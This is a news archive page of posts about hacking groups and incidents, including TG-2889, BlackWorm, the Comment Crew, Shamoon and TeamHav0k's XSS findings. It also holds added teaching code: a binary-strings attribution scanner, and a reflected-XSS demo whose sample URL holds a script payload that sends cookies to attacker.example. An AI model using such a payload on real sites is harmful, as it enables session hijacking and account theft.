ISSSource White Papers

Posts Tagged ‘hacking group’

Friday, October 9, 2015 @ 04:10 PM gHale

A hacking group that first came to notice last December is now probing a range of sectors in search of ways in, researchers said.

One research group believes Iran-based attackers are building a network of fake LinkedIn profiles in order to work their way into the business circles of telecommunications companies and defense contractors.


The Iranian group, which Dell SecureWorks’ Counter Threat Unit Threat Intelligence team named Threat Group-2889 (TG-2889), appears to be the same group Cylance and the FBI warned about in December, when it was infiltrating critical infrastructure organizations around the world, researchers said in a blog post.

Dell said the group is building a network of fake LinkedIn profiles, inventing identities for high-tech professionals and using them to make contact with companies in a number of countries.

The group appears interested in the aerospace, defense, military, chemical, energy, government, and education sectors. Most targets work in telecommunications, at companies located in the Middle East and North Africa.

Countries in the Middle East make up the majority of the targeted states. The top five are Saudi Arabia (39 businesses), Qatar (28), the United Arab Emirates (27), Pakistan (17), and the United States (12).

Dell has identified 25 fake LinkedIn profiles so far, and said all of them were created to support eight accounts it calls “leader personas.”

The other accounts exist only to support the leaders, lending them credibility and building a network of followers around them.

The follower accounts are bare, while the leader accounts carry considerable detail. TG-2889 members go so far as to join LinkedIn groups and update the listings regularly, changing names and photographs before anyone catches on.

Wednesday, September 3, 2014 @ 02:09 PM gHale

A hacking group is using an enhanced version of BlackWorm, a Remote Access Trojan (RAT), to work its way into organizations.

The Syrian Malware Team, a pro-Syrian-government hacking group that has operated since at least 2011, now primarily uses the “Dark Edition” of BlackWorm in its campaigns, said researchers at security firm FireEye.


FireEye also detailed an original, or private, version of BlackWorm (v0.3.0), which was “fairly simple [allowing] for very quick payload,” researchers said in a blog post.

The earlier version of the RAT supported a number of commands, including system restart and shutdown, displaying “startling” flash videos on targeted machines, downloading and running files, killing critical Windows processes, and blocking keyboard and mouse input, FireEye said.

The “Dark Edition,” however, is packaged with additional features that let attackers bypass User Account Control (UAC), disable firewalls and spread over network shares.

“Unlike its predecessor, [BlackWorm Dark Edition] allows for granular control of the features available within the RAT,” the blog post said. “These additional controls allow the RAT user to enable and disable features as needed. Binary output can also be generated in multiple formats, such as .exe, .src and .dll.”

One of the blog’s authors said that having a RAT inside the target environment gives the attackers practically free rein.

In its post, FireEye referenced IntelCrawler research linking Syrian Malware Team with hacktivist group Syrian Electronic Army (SEA). In the March report, IntelCrawler said an SEA member, going by the online alias “Hawks,” appeared to withdraw from SEA in 2012 with interest in starting the Syrian Malware Team.

Thursday, June 27, 2013 @ 07:06 PM gHale

The suspected China-based hackers known as the “Comment Crew,” identified in the Mandiant report, appear to be back in action.

In February, the group’s activity was the focus of a report from computer security vendor Mandiant.


Mandiant’s report said a specific Chinese military unit, Unit 61398, waged a seven-year hacking spree that compromised 141 organizations. The report added to long-running research by other security companies and organizations into suspected state-sponsored hacking.

The Comment Crew lay low for a while following the report but is hacking again, said Alex Lanstein, senior researcher at FireEye.

“They took a little breather, and they started back up,” Lanstein said.

Following the attention in February, the group abandoned much of its command-and-control infrastructure. Instead, it started from scratch, directing malware at new targets.

“We didn’t see them take control of any of the systems they had previously compromised,” Lanstein said. “They started fresh with a whole new round of attacks.”

The group, while skilled, has made mistakes, many of which Mandiant picked up. Continued analysis of the Comment Crew’s methods revealed another mistake, one that conceivably makes it easier to link separate attacks to a single source.

Lanstein said FireEye found the Comment Crew made an error when compiling their malicious software. When an application, including malware, is written in a programming language, the developer must compile it, translating it into machine code.

In some instances the Comment Crew failed to strip the name of their coding project, “Moonclient,” from the build, so the name remained in the compiled program and was plain to see when analysts decompiled it.
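The kind of leftover described above is what analysts hunt for with a strings pass over a sample. The following is an added example, not FireEye’s or Mandiant’s tooling: it pulls printable ASCII and UTF-16LE strings out of a binary and flags build artifacts such as embedded PDB paths and MSVC output directories, plus any names on a watchlist. The sample bytes, the file path inside them and the “Moonclient v2” string are constructed for the demonstration; the article reports only that the project name “Moonclient” was left in the compiled programs.

```python
"""Hunt for build artifacts (project names, PDB paths) left in a compiled binary.

Added example: a minimal 'strings + grep' pass of the kind an analyst runs to
spot the developer's footprint in a sample. Not FireEye's or Mandiant's tooling.
"""
import re

# Runs of 6+ printable ASCII bytes, and the same in UTF-16LE (each character
# followed by a NUL), which is how Windows binaries store wide strings.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")

# Patterns that betray the developer's build environment rather than the
# program's runtime behaviour.
BUILD_ARTIFACT_RES = [
    ("pdb-path", re.compile(r"^[A-Za-z]:\\.*\.pdb$", re.IGNORECASE)),
    ("msvc-output-dir", re.compile(r"\\(Release|Debug)\\", re.IGNORECASE)),
    ("projects-dir", re.compile(r"\\Projects?\\", re.IGNORECASE)),
]


def extract_strings(blob):
    """Return printable ASCII strings followed by decoded UTF-16LE strings."""
    found = [m.group().decode("ascii") for m in ASCII_RUN.finditer(blob)]
    found += [m.group().decode("utf-16-le") for m in WIDE_RUN.finditer(blob)]
    return found


def find_build_artifacts(blob, watchlist=()):
    """Return (string, [reasons]) for every extracted string that looks like a
    build artifact or mentions a watchlisted project name (case-insensitive)."""
    hits = []
    for s in extract_strings(blob):
        reasons = [label for label, rx in BUILD_ARTIFACT_RES if rx.search(s)]
        reasons += ["watchlist:" + w for w in watchlist if w.lower() in s.lower()]
        if reasons:
            hits.append((s, reasons))
    return hits


# Constructed sample: a fake PE-like fragment. The path and the version string
# are invented for this demonstration; only the project name is from the article.
SAMPLE_BINARY = (
    b"MZ\x90\x00\x03\x00\x00\x00" + bytes(range(8, 32))
    + b"This program cannot be run in DOS mode.\x00" + b"\x00" * 16
    + b"C:\\Users\\dev\\Projects\\Moonclient\\Release\\client.pdb\x00" + b"\x00" * 8
    + "Moonclient v2".encode("utf-16-le") + b"\x00\x00"
    + b"\xde\xad\xbe\xef" * 4
)

if __name__ == "__main__":
    for s, reasons in find_build_artifacts(SAMPLE_BINARY, watchlist=("Moonclient",)):
        print(f"{s!r}: {', '.join(reasons)}")
```

The DOS stub text is extracted but not reported, since it carries no attribution value; the PDB path is reported four times over, which is the point: a single forgotten path links the build directory, the toolchain and the project name in one string. Running the same pass across a corpus of samples and clustering on the reported strings is how separate attacks get tied back to one developer.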

Lanstein said the error showed “you are dealing with humans on the other side of the keyboard,” who are prone to make mistakes. “This is a mistake made over and over again,” he said.

FireEye decided to release information on the error because so much about the Comment Crew had already been published, and because the group’s tactics have since changed, disclosure would make little difference to researchers tracking them.

“It’s more difficult to track them now,” Lanstein said.

Monday, September 10, 2012 @ 05:09 PM gHale

One or more insiders with high-level access may have assisted the hackers who damaged some 30,000 computers at Saudi Arabia’s national oil company, Saudi Aramco, last month, according to a published report.

The attack using a computer virus known as Shamoon against the world’s biggest oil company, Saudi Aramco, is one of the most destructive cyber strikes conducted against a single business.


Shamoon spread through the company’s network and wiped computers’ hard drives. Saudi Aramco said office computers were damaged but the attack did not affect the systems software that supports its technical operations.

The hackers’ apparent access to a mole willing to take personal risk to help them is an extraordinary development in a country that bans open dissent.

“It was someone who had inside knowledge and inside privileges within the company,” said a source familiar with the ongoing forensic examination in the published report.

Hackers from a group calling itself “The Cutting Sword of Justice” claimed responsibility for the attack. They say the virus gave them access to documents on Aramco’s computers, and have threatened to release secrets. No documents have been published so far.

In addition to hitting Saudi Aramco, Shamoon also struck Qatar’s RasGas, the second largest LNG producer in the world, said sources at the CIA in an ISSSource report.

“The virus hit Aramco and Qatari RasGas. In both cases, it knocked out computer workstations and corporate web sites,” the sources said.

Saudi Aramco declined to comment. “Saudi Aramco doesn’t comment on rumors and conjectures amidst an ongoing probe,” it said.

The hacking group that claimed responsibility for the attack described its motives as political.

In a posting on an online bulletin board the day they wiped the files, the group said Saudi Aramco was the main source of income for the Saudi government, which it blamed for “crimes and atrocities” in several countries, including Syria and Bahrain.

Saudi Aramco, which supplies about a tenth of the world’s oil, has hired at least six firms with expertise in hacking attacks, bringing in dozens of outside experts to investigate the attack and repair computers, the sources said in the published report.

According to an analysis of Shamoon by computer security firm Symantec, the way the virus enters a network may vary, but once inside it tries to infect every computer on the local area network before erasing files and rendering the PCs unusable.

“We don’t normally see threats that are so destructive,” Liam O Murchu, who helped lead Symantec’s research into the virus, said. “It’s probably been 10 years since we saw something so destructive.”

The state-run oil company, whose 260 billion barrels of crude alone would value it at over $8 trillion, 14 times the market value of Apple Inc., appeared well protected against break-in attempts over the Internet, according to people familiar with its network operations.

Yet those sources say such protections could not prevent an attack by an insider with high-level access.

Shamoon is designed to attack ordinary business computers. It does not belong in the category of sophisticated cyber-warfare tools such as the Stuxnet virus that attacked Iran’s nuclear program in 2010, which target industrial control systems and can paralyze critical infrastructure.

Friday, June 8, 2012 @ 11:06 AM gHale

Hacking group UGNazi took down a string of sites, including HostGator, in live tests of a new denial-of-service (DoS) attack tool.

The tool, dubbed #TheHolocaust, targeted undisclosed vulnerabilities and crippled HostGator in seconds from a machine with 2 GB of RAM on a 10 Mbps down / 2 Mbps up link, the group said in a published report.


HostGator and a payments company remained offline until the issue was resolved.

The hackers wrote the DoS tool in Python and C++ and targeted vulnerabilities that would be easy to patch, a group member using the name “Godfather” said.

“We do not want to show the DOS Tool #TheHolocaust to the public yet as it is in development,” they said in the published report. “It affects the connection of the [targeted] server, as well as the [targeted] webserver.”

Not long before, UGNazi had hacked billing provider WHMCS through a social engineering attack against its host, HostGator.

The perpetrator, known as Cosmo, was arrested by the FBI. In a later hack, UGNazi changed the DNS records of the image board 4chan, pointing visitors to the hacking group’s Twitter account.

That hack was possible after the group gained access to the personal Gmail account of CloudFlare chief executive Matthew Prince. The DoS-protection company said the hackers got past Google’s two-factor authentication by exploiting a now-fixed “subtle recovery flaw” and bypassing the PIN on Prince’s AT&T voicemail.

UGNazi claimed the hack was worse than CloudFlare let on: the group said it “got into their main server” and accessed customer account information including names, IP addresses and payment data.

Friday, March 16, 2012 @ 11:03 AM gHale

The word Anonymous draws immediate attention from anyone in the cyber security world, bringing fear, suspicion and intrigue all at once. So it only makes sense that an organization would try to capitalize on the name with a marketing effort.

There is now a new operating system called “Anonymous-OS” that comes pre-loaded with tools for hacking and for protecting anonymity online. It remains unclear whether the new operating system has the hacking group’s endorsement.


Anonymous-OS version 0.1 was released Tuesday and SourceForge is offering it as a BitTorrent download, according to a post on the Anonymous-OS page.

The operating system is an Ubuntu-based Linux distribution built on Ubuntu 11.10 and uses the MATE desktop environment. The authors say they created it for “educational purposes,” to “(check) the security of Web pages,” according to the Anonymous-OS Tumblr page.

The new distribution comes loaded with tools useful to hackers, security researchers and those interested in preserving their anonymity online. Among the applications bundled with Anonymous-OS are the Tor anonymizing client, the Wireshark network protocol analyzer, the password cracker John the Ripper and PyLoris, a tool for launching denial-of-service attacks.

Its creators recommend booting the operating system from an external device such as a CD or USB drive, according to the Anonymous-OS Tumblr page.

Though the new Linux distribution clearly makes use of Anonymous’ name, it remains unclear whether any link exists between the group and those behind the new operating system.

Tuesday, January 24, 2012 @ 03:01 PM gHale

Once again, it bears repeating: if a hacker targets a specific organization, he will get in. That is what happened with a new hacking group called TeamHav0k, which launched an operation called “#OP XSS” to find cross-site scripting (XSS) vulnerabilities in major websites.

They found them.


A Pastebin document showed that sites including Verizon, the Huffington Post, the European Organization for Nuclear Research (CERN), Electronic Arts (EA), IGN and The New York Times contained such flaws.

Some educational institutions also had XSS holes, including the University of Illinois, Harvard, Yale and Rockefeller University.

Telecom company Verizon, media hosting company ImageShack, the site value and traffic estimator StatShow, Major League Gaming, and Dr Pepper complete the list.

Even though XSS vulnerabilities are among the most common flaws found in commercial websites, that does not make them harmless. An attacker who can inject script into a page runs it in the victim’s browser with the trust of the vulnerable site, which is enough to steal session cookies, hijack accounts or serve malware from a domain the user trusts.

Fortunately, some web browsers protect their users against the reflected form of these attacks, where the script arrives in the request and is echoed straight back in the response. Internet Explorer 8 and Internet Explorer 9, for instance, neutralize the reflected script and display a warning that the page has been modified to prevent cross-site scripting.

Google Chrome also mitigates the attack, but Opera and Mozilla Firefox do not, leaving their users exposed.

As a word of caution, websites need to work continuously to secure their domains against these common flaws. Because of the large number of visitors they receive each day, hackers could end up using them for malicious purposes.
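To make the flaw concrete, here is an added example, not code from TeamHav0k’s Pastebin or from any of the sites listed above: a search page that reflects its q= parameter, once by concatenating the raw term into the HTML and once by entity-encoding it with html.escape. The crude reflects_markup check mimics what the Internet Explorer and Chrome filters do, which is to see whether tag-like markup from the request reaches the response unchanged. The URL, the search.example and attacker.example hosts and the cookie-stealing payload are all constructed for the demonstration.

```python
"""Reflected XSS: a vulnerable search-results page beside its escaped form.

Added example, not code from any of the sites named in the article.
"""
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample request. search.example and attacker.example are
# hypothetical hosts; the payload ships the victim's cookies to the attacker.
SAMPLE_URL = (
    "https://search.example/?q=%3Cscript%3Enew+Image%28%29.src%3D"
    "%22https%3A%2F%2Fattacker.example%2F%3Fc%3D%22%2Bdocument.cookie%3C%2Fscript%3E"
)


def search_term(url):
    """Pull the q= parameter out of a request URL, URL-decoded as a server would."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_vulnerable(term):
    """Unsafe: attacker-controlled text is concatenated straight into HTML,
    so a <script> element in the term executes when the browser parses the page."""
    return "<h1>Results for: " + term + "</h1>"


def render_hardened(term):
    """Safe for element-content context: <, >, & and both quote characters
    become entities, so the browser shows the payload as text instead of running it."""
    return "<h1>Results for: " + html.escape(term, quote=True) + "</h1>"


# Anything that looks like the start of an HTML tag: "<", optional "/", a letter.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z]")


def reflects_markup(term, page):
    """Crude reflected-XSS check in the spirit of the browser filters the
    article mentions: the request parameter contains tag-like markup and
    that markup reaches the response byte for byte."""
    return bool(TAG_RE.search(term)) and term in page


if __name__ == "__main__":
    term = search_term(SAMPLE_URL)
    print(render_vulnerable(term))
    print(render_hardened(term))
    print("vulnerable page reflects markup:", reflects_markup(term, render_vulnerable(term)))
    print("hardened page reflects markup:", reflects_markup(term, render_hardened(term)))
```

Two caveats a practitioner would add. html.escape is the right encoder only for HTML element content and quoted attribute values; a term placed inside a JavaScript string, a URL or a CSS block needs that context’s own encoding, and the filter-style check above catches only reflected injection, which is also all the IE and Chrome filters ever addressed. Stored and DOM-based XSS reach the browser without the payload appearing in the request, so the server-side escaping, not the browser, is what actually closes the hole.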

Monday, August 1, 2011 @ 03:08 PM gHale

A British teenager accused of acting as spokesman for computer hacking groups LulzSec and Anonymous is now out on bail – and not allowed to use the Internet.

Jake Davis, 18, faces charges after his arrest last week at his home on Scotland’s Shetland Islands.


Police said he mounted a cyber attack on Britain’s Serious Organized Crime Agency.

Davis used the online nickname Topiary and acted as a spokesman for the two hacktivist groups, linked to attacks on Britain’s National Health Service, Sony Corp., The Sun newspaper and other targets, police said.

Davis appeared Monday at City of Westminster Magistrates’ Court in London. Judge Howard Riddle ordered him released on bail — on condition he not use the Internet — until a court appearance Aug. 30.

Hacking arrests continue to rise: 16 people now face charges after arrests in the U.S. in connection with cyber attacks by the Anonymous group, the U.S. Department of Justice said.

An indictment filed last week in San Jose, Calif., names 14 people accused of conspiring to intentionally damage protected computers at PayPal last December in retribution for PayPal suspending WikiLeaks’ account to prevent supporters from donating to the whistleblower site. The arrests occurred in Alabama, Arizona, California, Colorado, the District of Columbia, Florida, Massachusetts, Nevada, New Mexico, and Ohio, the Justice Department said. The defendants will make initial appearances in federal courts in their areas.

In two separate indictments, a Sarasota, Fla., man faces charges of intentionally damaging a protected computer by accessing the Web site of InfraGard Tampa Bay, an FBI partner, in June. The complaint said he released instructions on how to exploit the Web site.

Another man faces charges in Las Cruces, N.M., for stealing confidential business information from AT&T servers and posting it publicly in April, police said. The defendant, who worked as a customer support contractor for AT&T at outsourcing provider Convergys, is charged with accessing a protected computer without authorization for downloading thousands of documents, applications and other files and then posting them on the Internet, the indictment said.
